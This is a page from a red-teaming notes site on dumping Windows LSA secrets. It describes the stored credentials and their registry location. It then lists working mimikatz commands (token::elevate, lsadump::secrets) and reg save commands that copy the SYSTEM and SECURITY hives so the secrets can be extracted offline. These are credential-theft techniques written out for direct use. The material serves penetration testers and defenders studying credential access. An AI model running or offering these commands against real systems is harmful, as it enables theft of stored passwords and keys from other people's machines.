Red Teaming Experiments
linkedin
github
@kondencuotas
About /?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Dumping Credentials from Lsass.exe Process Memory
Dumping Lsass.exe to Disk and Extracting Credentials
Dumping LSASS without Mimikatz == Reduced Chances of Getting Flagged by AVs
Security Accounts Manager
Dumping LSA Secrets
Dumping and Cracking mscash - Cached Domain Credentials
NTDS - Domain Controller
Network vs Interactive Logons
Reading DPAPI Encrypted Secrets with Mimikatz and C++
T1214: Credentials in Registry
T1174: Password Filter
Forcing WDigest to Store Credentials in Plaintext
Lateral Movement
Persistence
Exfiltration
miscellaneous
Process Environment Block
Parsing PE File Headers with C++
Exploring Injected Threads
Dump Virtual Box Memory
Reversing Password Checking Routine
Powered by GitBook

Dumping LSA Secrets

What is stored in LSA secrets?

Originally, the secrets contained cached domain records. Later, Windows developers expanded the application area for the storage. At this moment, they can store PC users' text passwords, service account passwords (for example, those that must be run by a certain user to perform certain tasks), Internet Explorer passwords, RAS connection passwords, SQL and CISCO passwords, SYSTEM account passwords, private user data like EFS encryption keys, and a lot more. For example, the NL$KM secret contains the cached domain password encryption key.

Storage

LSA Secrets are stored in registry:

HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets

Execution

Memory

Secrets can be dumped from memory like so:

[email protected]
token::elevate
lsadump::secrets

Registry

LSA secrets can be dumped from registry hives likes so:

[email protected]
reg save HKLM\SYSTEM system & reg save HKLM\security security
[email protected]
lsadump::secrets /system:c:\temp\system /security:c:\temp\security

References

​

Previous
Security Accounts Manager
Next
Dumping and Cracking mscash - Cached Domain Credentials
Last updated 2 months ago
Contents
Storage
Execution
Memory
Registry
References